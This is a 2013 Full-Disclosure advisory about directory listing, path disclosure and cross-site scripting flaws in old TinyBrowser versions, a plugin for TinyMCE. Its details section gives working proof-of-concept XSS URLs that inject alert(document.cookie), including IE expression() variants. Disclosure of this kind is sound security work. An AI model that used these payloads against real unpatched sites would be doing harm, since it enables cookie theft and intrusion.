| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 9 Jan 2013 23:51:11 +0200 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk> Subject: Multiple vulnerabilities in TinyBrowser Hello list! I want to warn you about multiple vulnerabilities in TinyBrowser for TinyMCE. These are new vulnerabilities in addition to my 2009 and 2011 advisories about Arbitrary File Upload and Code Execution vulnerabilities in TinyBrowser. It concerns as TinyBrowser, as all web applications which have TinyBrowser in core or as third-party plugins for them. These are Information Leakage, Full path disclosure and Cross-Site Scripting vulnerabilities. ------------------------- Affected products: ------------------------- Vulnerable are old versions of TinyBrowser (such as 1.33 and previous versions). Last versions are not affected - in TinyBrowser 1.42 these vulnerabilities are already fixed. ---------- Details: ---------- Information Leakage (Directory Listing) (WASC-13): http://site/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type= http://site/js/tiny_mce/plugins/tinybrowser/edit.php?type= Listing of site's root directory if there is no upload directory. Full path disclosure (WASC-13): In tinybrowser.php and edit.php FPD is shown, if there is no upload directory. If to upload script with extensions of an image, then FPD is also shown. XSS (WASC-08): http://site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)// For IE: http://site/js/tiny_mce/plugins/tinybrowser/upload.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) http://site/js/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) http://site/js/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie)) ------------ Timeline: ------------ 2013.01.06 - informed developer. In any case these holes are fixed in last versions of software. 2013.01.08 - disclosed at my site (http://websecurity.com.ua/6247/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists